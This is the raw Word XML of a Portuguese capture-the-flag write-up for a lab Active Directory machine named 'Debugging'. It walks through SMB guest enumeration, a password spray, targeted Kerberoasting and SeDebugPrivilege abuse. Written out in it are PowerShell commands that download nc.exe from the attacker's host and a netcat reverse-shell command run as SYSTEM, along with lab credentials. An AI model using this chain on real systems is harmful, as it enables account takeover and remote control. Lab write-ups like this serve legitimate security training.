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120" w:before="360" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.fltw7z571btl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9l2lsbw3fbz5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Debugging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d6fo8h5oxdbv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uma enumeração de portas com RustScan para identificar as portas expostas pela aplicação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rustscan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87700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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enumeração com RustScan identificou as portas TCP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88 (Kerberos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445 (SMB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5985 (WinRM)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3389 (RDP) expostas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enumerar a porta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445 (SMB)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a ferramenta nxc, o serviço respondeu, porém não foi possível autenticar, não havia usuário/senha válidos e o acesso foi negado.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27300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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serviço SMB permite autenticação anônima utilizando o usuário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guest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sem exigência de senha. Durante os testes, foi possível estabelecer conexão com sucesso e enumerar permissões utilizando a ferramenta nxc com a opção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--shares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análise confirmou que o usuário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guest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permissões de leitura nos compartilhamentos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general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IPC$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visualização do conteúdo disponível nesses diretórios.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''--shares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89313"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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3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Dando continuidade à utilização da ferramenta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nxc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empregado o módulo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spider_plus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permitiu enumerar os arquivos aos quais o usuário possui permissão de leitura dos compartilhamentos disponíveis.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spider_plus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93900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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00100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="3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ferramenta nxc gera um arquivo no formato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contendo os resultados obtidos pelo comando executado com o módulo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spider_plus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incluindo a relação dos arquivos enumerados e seus respectivos metadados. O arquivo gerado encontra-se no diretório. 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/home/&lt;your-user&gt;/.nxc/modules/nxc_spider_plus/&lt;machine-ip&gt;.json,.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diretório e formatar a saída com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jq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localizado o arquivo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Welcome.txt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diretório general.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06500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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Utilizando o smbclient para acessar o diretório, conseguimos efetuar o download do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//172.16.1.6/general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44800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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Welcome.txt é um documento corporativo que contém o formato da senha padrão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Debugging[EntryYear]!@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lista dois usuários identificados como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Vitiex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Hudson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Debugging[EntryYear]!@</w:t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Ex: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Debugging2020!@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</w:t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87700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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formato da senha padrão conhecido e as contas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Vitiex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Hudson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identificadas, é possível realizar um ataque do tipo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password-spray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contra essas contas. O ataque usa esta técnica para identificar credenciais válidas, tentando múltiplas senhas contra uma ou mais contas de usuários válidos. Foi criado o arquivo user.txt contendo a lista de usuários identificados.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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92200"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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criada a wordlist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pass.txt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contendo variações do padrão identificado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Debugging[EntryYear]!@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Exemplos gerados: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Debugging2020!@, Debugging2021!@, Debugging2022!@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lista foi construída por um script Python em nossa máquina de ataque.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range(2000,2026):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print(f"Debugging{numbers}!@")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98700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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listas de usuários e a wordlist gerada, realizámos um password-spray contra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usando o utilitário nxc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--continue-on-success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49400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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60500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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ataque revelou usuário e senha válidos.</w:t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hudson:Debugging2019!@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credencial do usuário Hudson, verificámos os serviços e permissões acessíveis na máquina alvo.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conta tem permissões para acessar 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LDAP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consultas e operações de manutenção no diretório hierárquico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hudson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'Debugging2019!@'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12800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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verificação do acesso do usuário, é possível extrair os dados do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LDAP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as ferramentas seguintes: </w:t>
      </w:r>
      <w:hyperlink r:id="rId2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nxc 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ou </w:t>
      </w:r>
      <w:hyperlink r:id="rId2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ldapdomaindump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color w:val="37474f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ferramenta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nxc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utilizada para realizar a extração das informações do diretório via LDAP, gerando um arquivo compactado no formato .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diretório</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="37474f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t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/home/&lt;your-user&gt;/.nxc/logs/&lt;your-file&gt;_bloodhound.zip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--dns-server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hudson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'Debugging2019!@'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--bloodhound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104900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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deste ponto, foi utilizada a ferramenta </w:t>
      </w:r>
      <w:hyperlink r:id="rId2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BloodHound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mapear e analisar a estrutura do Active Directory</w:t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44900"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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estabelecida conexão na ferramenta utilizando as credenciais obtidas na instalação  e, em seguida, realizado o upload do arquivo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gerado anteriormente.</w:t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17800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="3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color w:val="ff0000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carregar todos os arquivos no BloodHound, foi selecionado o usuário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HUDSON@DEBUGGING.CORP</w:t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600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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as permissões do usuário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HUDSON@DEBUGGING.CORP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70300"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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permissão GenericWrite permite ao usuário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HUDSON@DEBUGGING.CORP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modificar diversos atributos do usuário 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SVC_DEBUG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como grupos, descrições e scripts de logon, possibilitando ações que podem levar à elevação de privilégios. No entanto, essa permissão não inclui controles sensíveis, como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ResetPassword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que impede a redefinição direta da senha ou o controle total da conta. Se um atacante obtiver GenericWrite sobre um usuário, ele pode gravar no atributo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servicePrincipalNames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imediatamente iniciar um ataque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Kerberoasting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direcionado.</w:t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17700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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um ataque </w:t>
      </w:r>
      <w:hyperlink r:id="rId3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Kerberoasting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direcionado pode provocar a emissão de um ticket de serviço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(TGS)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 conta alvo, é possível obter o hash do conteúdo criptografado desse ticket. Ao quebrar esse hash, obtemos credenciais que possibilitam acesso a outros serviços.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targetedKerberoast.py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'&lt;machine-ip&gt;'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'debugging.corp'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'hudson'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'Debugging2019!@'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Usando o Hashcat para identificação do formato, verificamos que a hash corresponde ao modo 13100 (Kerberos 5 TGS-REP, etype 23). Em seguida executamos o Hashcat com -m 13100 para realizar a quebra da senha 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color w:val="ff0000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Quebramos a senha com sucesso a credencial da conta de serviço do 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svc_debug</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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wordlist.txt).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!!!Saaliegah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8yggsox1ibv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credenciais válidas dá conta de serviço, um atacante poderia autenticar-se como esse, ou outro serviço e potencialmente escalar privilégios ou mover-se lateralmente dentro do domínio, dependendo das permissões associadas à conta. Após recuperar a credencial da conta de serviço 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svc_debug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testamos autenticação em serviços de gerenciamento remoto Windows como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WinRM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ferramenta nxc nos mostra que temos acesso ao Winrm.</w:t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'svc_debug'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'!!!Saaliegah'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81100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="5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validar as credenciais da conta de serviço svc_debug, estabelecemos uma sessão remota com o host alvo utilizando  o </w:t>
      </w:r>
      <w:hyperlink r:id="rId3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evil-winrm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172.16.15.36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svc_debug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'!!!Saaliegah'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17600"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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desta forma temos acesso remoto ao sistema, e também conseguimos visualizar a flag de usuário.</w:t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95500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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l5wmxrus9yvf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98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Ao executar o comando: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami /priv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, verificamos que o privilégio</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> SeDebugPrivilege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está habilitado </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(Enabled),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permitindo que o usuário depure e acesse processos do sistema.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color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SeDebugPrivilege (Debug programs)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— permite abrir qualquer processo (inclusive processos de sistema) e pode ser usado para extrair credenciais na memória ou injetar código.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whoami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/priv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25400" l="25400" r="25400" t="2540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explorar este privilégio, transferimos para o host dois arquivos estáticos  </w:t>
      </w:r>
      <w:hyperlink r:id="rId42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nc.exe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 script </w:t>
      </w:r>
      <w:hyperlink r:id="rId43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psgetsys.ps1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; ambos foram previamente baixados em nossa máquina de ataque</w:t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4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Subimos um servidor Python na nossa máquina de ataque para hospedar os arquivos.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5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baixamos os arquivos necessários para a máquina alvo.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(New-Object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Net.WebClient).DownloadFile('http://&lt;your-ip&gt;/nc.exe',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'C:\Users\svc_debug\Desktop\nc.exe')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(New-Object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Net.WebClient).DownloadFile('http://&lt;your-ip&gt;/psgetsys.ps1',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'C:\Users\svc_debug\Desktop\psgetsys.ps1')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89000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="2540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IEX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carregámos o script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psgetsys.ps1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sessão PowerShell e validámos que a função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ImpersonateFromParentPid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estava presente no ambiente. Em seguida, localizamos o processo do winlogon como alvo para as ações.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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IEX(Get-Content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.\psgetsys.ps1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Get-Command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ImpersonateFromParentPid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Get-Process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winlogon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44700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="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função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ImpersonateFromParentPid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cria um processo filho a partir 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PID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processo pai, fazendo com que o novo processo herde os privilégios do winlogon, ou seja, o processo filho é executado com privilégios de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Administrator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Invocamos o processo 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PID 776 (winlogon.exe)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passando como argumento o binário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nc.exe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passou a ser executado com privilégios de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ImpersonateFromParentPid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-ppid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"c:\windows\system32\cmd.exe"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-cmdargs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C:\Users\svc_debug\Desktop\nc.exe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&lt;your-ip&gt;-e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cmd.exe"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9100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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25400" l="25400" r="25400" t="2540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foi possível obter shell com privilégio máximo, acessar o Desktop do Administrator e obter a última flag com o comando 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root.txt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52800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="4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headerReference r:id="rId52" w:type="default"/>
      <w:headerReference r:id="rId53" w:type="first"/>
      <w:headerReference r:id="rId54" w:type="even"/>
      <w:footerReference r:id="rId55" w:type="default"/>
      <w:footerReference r:id="rId56" w:type="first"/>
      <w:footerReference r:id="rId57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rPr>
        <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
      </w:rPr>
    </w:pPr>
    <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.uj30kgtw98s1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1" name="image18.jpg"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr id="0" name="image18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2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Debugging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8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42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/int0x33/nc.exe/blob/master/nc64.exe" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://raw.githubusercontent.com/decoder-it/psgetsystem/refs/heads/master/psgetsys.ps1" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId45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image" Target="media/image9.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6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72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31.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ShutdownRepo/targetedKerberoast" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Hackplayers/evil-winrm" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/dirkjanm/ldapdomaindump" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Pennyw0rth/NetExec" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://bloodhound.specterops.io/get-started/quickstart/community-edition-quickstart" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer2.xml"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://jqlang.org/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37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jpg"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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2a6bkbP45iOilQQZi/E7g8o23w==">CgMxLjAyDmguZmx0dzd6NTcxYnRsMg5oLjlsMmxzYnczZmJ6NTIOaC5kNmZvOGg1b3hkYnYyDWguOHlnZ3NveDFpYnYyDmgubDV3bXhydXM5eXZmMg5oLnVqMzBrZ3R3OThzMTgAciExZW9paksxaEhXQkNOWGJNWWZ0ZGY3TkF4ZXRVX1NOXy0=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